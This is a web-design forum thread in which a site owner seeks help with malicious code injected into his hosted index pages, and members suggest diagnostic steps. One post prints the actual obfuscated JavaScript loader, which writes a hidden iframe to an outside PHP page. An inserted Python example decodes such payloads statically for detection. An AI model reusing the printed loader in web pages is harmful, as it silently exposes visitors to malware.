Full Version: Virus linked to my websites....
morbid1
I have done a lot of searching, but no answers, I hope this is the proper place to post this. I am not real sure, if it is not I apologize.
I have had hosting at the same company for 4-5 years now, not the best but usable anyway.
I really hope someone can help me as I have run out of ways to try and get rid of this problem, it is driving me insane, or should I say more insane!
I host probably 30-40 websites, most of which I have built and host for customers, I am not a great "coder" so I use Dreamweaver, I do design all of my sites and graphics in Photoshop then load into Dreamweaver then publish them to my host.
Recently when I go to some of my websites my antivirus pops up warning me there is a virus now collected from that website!
I contacted the host, they say it is my issue, deal with it.
I have no idea how to stop this or how to remove them, I have scanned in my servers, they found several viruses and supposedly removed them, but still I get these viruses from some of my sites' homepages....
Can someone PLEASE, PLEASE tell me what to do to stop this asap! I am losing customers I am sure....
again, sorry if this post is in the wrong area, I did not know where else to turn for answers.
Thank you
DasMorbid1
pandy
So what virus did your AV say it was? Have you also scanned your local machine? There are viruses that inject script code in HTML files, so if you have uploaded new files, your own computer could be the source.

Do you have ads, counters or other things (except plain images) from outside sources on your sites?
morbid1
Thank you 4 ur help,
AVG says it is a Trojan, I will look closer and write down exactly what it says this time, I need to re-boot in XP, not showing it seems in Vista.....
No outside links on some of the sites, no ads, no "old scripts" as the host calls em....
Here are some of the urls if you want to try, I think what it does is want you to load active x etc...
REMEMBER BEFORE YOU CLICK THESE LINKS, SOME HAVE BEEN KNOWN TO SHOW VIRUSES ON MY COMPUTER THROUGH AVG!
http://www.loc-cod.org/
http://www.hotmodders.com/
http://www.illusive-fantasy.com/
now I am not showing anything on Vista, I will try XP again and see if any viruses still try to execute......


I rebooted in WinXP Pro, went to www.loc-cod.org and sure enough up popped AVG with: trojan horse downloader.... sysiuzx.exe virus detected etc....
Then it also had:
it found a problem with my temp files, loc-cod[1].htm ?
I am going to try and research further, but basically this is what all of them say that have this problem, trying to figure out where loc-cod[1].htm comes from..... since it should be loc-cod.html.....



OK I have now boiled it down to this, basically they are saying somehow they are injecting malicious code to my webpages? How can I stop this, I am losing people every day I believe because of this.
I found this out, it goes down to a virus, non malicious destroyer, js/psyme, and is talked about here at this link:
http://www.geeknewz.com/board/lofiversion/...x.php/t835.html

I really need to know how to get this stuff off my web pages and how not to allow this stuff to happen again, I have been free of problems like this on my host for 4-5 years now...
Thanks to all who can help.
Brian Chandler
QUOTE
REMEMBER BEFORE YOU CLICK THESE LINKS, SOME HAVE BEEN KNOWN TO SHOW VIRUSES ON MY COMPUTER THROUGH AVG!
http://www.loc-cod.org/
http://www.hotmodders.com/
http://www.illusive-fantasy.com/
now I am not showing anything on Vista, I will try XP again and see if any viruses still try to execute......


Can't connect to the first two - the third (i-f.com) has nothing odd-looking in it. Probably some problem on your computer... what does "Vista" stand for? "Virus Incubation System, Try Again"?
Peter1968
Wow, Brian you must be the last person on Earth who doesn't know what Vista is.

http://www.microsoft.com/windows/products/...ta/default.mspx

Now everyone knows what it is.
morbid1
lol....should have said I was dual booting....
anyway ladies and gents, I cannot figure out how to get rid of it, when using Vista OS, it asks if I want to install RDS/ Something.... like an activex plug in....
I really need to get rid of this crud off my sites, how would I update all scripts etc... in my websites with Dreamweaver?
I keep being told by my host they can't do anything and it is not their problem, even if the virus was injected on their servers... 8(
Cannot figure out how this file loc-cod[1].htm is getting in my temp folder?
morbid1
I have finally downloaded the files from loc-cod.org, the code was actually in the index file itself! Could not even open the file once downloaded, would not this be a leak in my host? How else can they just come in and put code in my index files?
Christian J
Sometimes AV-programs produce false alerts. Do other people get virus alerts on your sites?

You might check if your host has anything to do with this by uploading one of your sites to another temporary host. If you get virus alerts there too, your first host may not be to blame.

You could also try uploading a brand new test page to your old host from another computer, if you then get a virus alert the host is probably to blame.
morbid1
As I stated, it was put into my index pages, how can they write to my webpages is the question now....
Certainly security should have stopped them from being able to inject code into my webpages?
Brian Chandler
QUOTE(morbid1 @ Jul 21 2007, 09:04 PM) *

As I stated, it was put into my index pages, how can they write to my webpages is the question now....
Certainly security should have stopped them from being able to inject code into my webpages?


_What_ was "put into your index pages"? So far there is not a scrap of coherent evidence that anything was. Can you show us a listing of the part of your index part that includes this "injection"?

Otherwise it is vastly more likely that something funny is happening on _your_ computer. No-one here can really help you with that, because we don't have access to your computer.

morbid1
OK NOW I FOUND THIS!...lol....
Really not funny but trying not to lose my mind, when I look at my original pages on my hard drive they look normal, when I upload the page to my host I now see the same code, but with new code also! some of the new code is like this:

</script>
</head>
<body bgcolor="#000000" onload="MM_preloadImages('enter_realmovr.jpg')"><!-- o65 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109111099114111103103101114046119';
s=s+'115047102108097115104047105110100101120046112104112034032119105100116104061053032104101105103104116';
s=s+'061053032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069062';
s=s+'032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c65 -->
<!-- ImageReady Slices (new_enter_image.psd) -->
<div align="center">

some of that code does not show up on my original index pages...
Any ideas on how this code is being automatically written to my webpages? Must be some command file on the server, in my host area or wherever...
Can I put the html that is in my original index page on here, then put the code that is there when I upload it?
Not sure if that is allowed to put that code on here, sorry I am a novice at coding etc... I have Dreamweaver do the work usually....
Thanks again all who help, this is driving me and my host mad!
morbid1
no 1? 8(
morbid1
Here is a screenshot of the warning I get when going to several of my websites now:
Christian J
That code might be inserted into the HTML file from your own computer (during file transfer?) or from the server (possibly through a rootkit, which is hard to detect). Try my ideas above to make sure which it is.
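
An added example (not code from any poster in this thread): a static check that compares a local original with the copy fetched from the host, lists script blocks that exist only in the served copy, and decodes a three-digits-per-character payload like the one in the listing above without running it. The sample pages and the injected.example host are constructed, and the function names are this example's own.

```python
import re

# Quoted runs of decimal digits, as used by the injected nbsp() loader above.
DIGIT_RUN = re.compile(r"'(\d{3,})'")
SCRIPT = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
IFRAME_SRC = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def added_scripts(local_html, served_html):
    """Return <script> blocks present in the served copy but not in the local original."""
    known = {s.strip() for s in SCRIPT.findall(local_html)}
    return [s for s in SCRIPT.findall(served_html) if s.strip() not in known]


def decode_triplets(script):
    """Statically decode the payload: join the digit strings, read 3 digits per character."""
    digits = "".join(DIGIT_RUN.findall(script))
    out = []
    for i in range(0, len(digits) - len(digits) % 3, 3):
        code = int(digits[i:i + 3])
        if code > 191:  # the loader's test against 0xBF: such codes are shifted up by 848
            code += 848
        out.append(chr(code))
    return "".join(out)


def report(local_html, served_html):
    """List each added script with any iframe URLs hidden in its decoded payload."""
    findings = []
    for script in added_scripts(local_html, served_html):
        decoded = decode_triplets(script)
        findings.append({"decoded": decoded, "iframes": IFRAME_SRC.findall(decoded)})
    return findings


# Constructed sample: a clean page and a served copy carrying an inert loader.
# The hidden markup and the injected.example host are made up for this example.
HIDDEN = '<IFRAME src="http://injected.example/index.php" width=5 height=5></IFRAME>'
ENCODED = "".join(f"{ord(c):03d}" for c in HIDDEN)
LOCAL = '<html><head></head><body bgcolor="#000000"><div>site</div></body></html>'
LOADER = ("<script language='JavaScript'>function nbsp(){var s='';"
          f"s+='{ENCODED[:60]}';s=s+'{ENCODED[60:]}';s=s+'032';"
          "/* decode loop omitted */}nbsp();</script>")
SERVED = LOCAL.replace("<div>", "<!-- o65 -->" + LOADER + "<!-- c65 --><div>")

if __name__ == "__main__":
    for finding in report(LOCAL, SERVED):
        print(finding["iframes"], repr(finding["decoded"]))
```

Running the same comparison on a copy fetched from a second computer separates a modified file on the server from something altering pages on the machine that views them.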

Brian Chandler
QUOTE

OK NOW I FOUND THIS!...lol....
Really not funny but trying not to lose my mind, when I look at my original pages on my hard drive they look normal, when I upload the page to my host I now see the same code, but with new code also! some of the new code is like this:

</script>
</head>
<body bgcolor="#000000" onload="MM_preloadImages('enter_realmovr.jpg')"><!-- o65 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';

... <snip>



OK, well, help by saying _exactly_ where you found this. If this appears at the head of a page, and you didn't put it there, you need to ask someone else to download the same page and see if the junk appears to them too. Then you know whether the problem is your computer or the server.

morbid1
I have re-uploaded several index.html pages, only a few ended up with this code being written to them, and also these are brand new operating systems, clean installs....
Christian J
I recall seeing something like the above javascript when I first looked at one of the linked pages, so it's definitely present online occasionally.

What I'm wondering is if the files got infected by your computer (even if they look clean offline) or by the server. When you say your OSs are clean installs, haven't you moved any files or programs to those computers from the first one (HTML files, Dreamweaver, etc)?
morbid1
clean installs, new installs of Dreamweaver etc... the backups of my websites are on another drive, move one of them after they are looked at thoroughly, upload it and boom, there it was again, and only happens on some of the index pages I uploaded. I now have found an index page that had 30-50 advertisement links that I never had there, I saved a copy of it, uploaded a new index page and it's ok for now, but somehow these people are getting into my servers, has to be.
Darin McGrew
When was the last time you changed your password?
morbid1
I have been changing them everyday now until a solution is found.
I now have this, I deleted an index page on one of my websites, when you go to it now it shows a PHP error, shouldn't do that when it was an html page that was there.
I think someone has gotten in from my forums and has run a PHP script to do this damage.
You can see that error here,
www.loc-jk2.com
that is where I simply deleted my index.html file.
Peter1968
Only a bunch of PHP's version of 404 errors on that site.
Christian J
QUOTE(morbid1 @ Jul 24 2007, 10:30 PM) *

I have been changing them everyday now until a solution is found.

The web host account's FTP password?

QUOTE
I now have this, I deleted an index page on one of my websites, when you go to it now it shows a PHP error, shouldn't do that when it was an html page that was there.

True, http://www.loc-jk2.com/ shows PHP warnings and errors. This means there's still a default file in the web root directory, and that this file (index.php? index.html?) is parsed for PHP (files with .html extensions --or any other extension-- can be parsed for PHP too). Are you sure the directory is empty?

morbid1
No, the directory is not empty but there are no PHP files linked to this website anywhere that I know of, there is a forums but why would that make errors by deleting an HTML page?
I think there is a script, the script that is causing all these malicious codes, running in my host looking for that index.html file?
Usually when I delete an index.html file it simply shows the directory of that site.....

I change the C-Panel and FTP usernames and passwords often.
Christian J
Somehow the server is configured to use a certain file name as the directory default. One way to do that is through a ".htaccess" file:
http://www.javascriptkit.com/howto/htaccess6.shtml (and more generally http://www.javascriptkit.com/howto/htaccess.shtml ) --do you have such a file? Note that some FTP programs don't display it unless you configure them to do so.

If you don't use a .htaccess file, maybe the web host can tell you the file name(s) the server is configured to use as directory default.
pandy
Obviously common.php is there anyway. What other files do you see?
shack811
Hello, sorry to drag this one up again, but, I'm having the same problems.

I use the host Supanames - not sure if the original poster does too and I'm getting the same symptoms with the virus alert.

I normally just upload the index again and it disappears for about a week or so.

It's been happening to me for about a month with current sites and new ones created with them, funny thing, a really old site I haven't touched doesn't appear to be infected which makes me think it's on my PC.

When I quizzed the Supanames support team, they say that the index files in question have been replaced at around 3:00am etc. - so this couldn't have been uploaded by me. They say change the passwords etc. on the sites - which I have, but the problem hasn't been resolved.


The latest is http://www.kirbymuxloefc.co.uk if you want to take a look (this will be replaced over the weekend to get it back to normal).

Any replies on this problem would be greatly appreciated.
morbid1
Hello,
I had this problem with many of my sites, and I have noticed even my host's index files have the same "re-direct" now, I warned them but they don't seem to understand, they are foreign based.
I can tell you how I caught the fools, you have some type of PHP, database etc... don't you? Probably a forums?
I erased all of my databases, forums etc... if you can't do this you need to look at the forums you have that are being attacked by spammers...
Do you have any PHP running?
I also completely reloaded my Dreamweaver, FTP programs, set up secure FTP, changed my passwords and usernames to very hard ones to detect.
I found in my case that it somehow was being executed after uploading files, sometimes within seconds, I just kept checking them as often as possible, but all problems stopped when I wiped out my forums.
It is sad that these people have no better way to spend their time than to ruin one's hard work.
Anyway, you can find more info here also, main thing here is that you will find your sites "marked for problems" on Google, so you also need to join the StopBadware link so that you can keep up with this, and if you have a mark on Google, once you clean up your files you will have to ask them to review your site and take it off, sometimes this can take months I hear, mine took a week or so to be removed. I don't know if you have noticed yet but here is what Google does when you have this malicious code:
http://googlesystem.blogspot.com/2007/02/g...at-install.html

you also need to visit:
http://groups.google.com/group/stopbadware

I will keep watching here and do the best I can to help you, I know there are many ways these hackers have found to infiltrate, hope this helps. Email me if you need further assistance,
designer@illusive-fantasy.com

PS: I hadn't even known there were more questions, very sorry, thought topic was closing, hope this helps and maybe we can find exactly what it was in my forums, I think anyway.....
morbid1
I am now being attacked again..........
I am finding that malicious code in my sites all over again, where do I search to find out more ABOUT THIS CODE?
Brian Chandler
You could try googling for "this code". But that probably won't help.

If you want help here, you need to provide *specific* evidence, that can be looked at by a blinkered empiricist. Such as: "Here's a URL ..... Why does ....[details]... happen when I access it?"

With the sort of questions you're asking currently, only a fortune-teller could reasonably offer to help you. (That's "reasonable" as in "fortune-telling"...)
Memyself
All you need to do is delete the entire JavaScript code from your index page and then change your FTP password. Make sure you don't save that in your FTP client since the virus can auto dial itself back to your site if the login and password is saved.

That should fix the issue.

On the other hand, download a good anti virus program (try Nod32 you can download a free copy from their site at www.nod32.com).

Good luck!
befriendlyin
Hi Morbid1,

I have studied the problem you are facing. In fact 3 of my client's site has gone through this issue and I am somehow very close to the solution.

You please delete any type of ads (which assure you free commission) from your forums pages. Once you delete those ads from your pages, your index page won't be down but still hackable (that garbage code after body tag will come) and still those trojan thing will come on your computer but your index page won't be down.

I have observed this on my client's site. Right now i m till that solution only, once i find something i will update you.
elmotw
Maybe a stupid question,

But when I was installing a cracked version of Direct Admin for testing I found those virus lines in the root of a Russian website when Direct Admin looks for the update during installation. I am using a reborn card, so the only thing I had to do was reset my PC.
If you are using the same cracked version of Direct Admin, it could be that this version has a virus in it.
That could explain why all your customers are infected.

Elmo
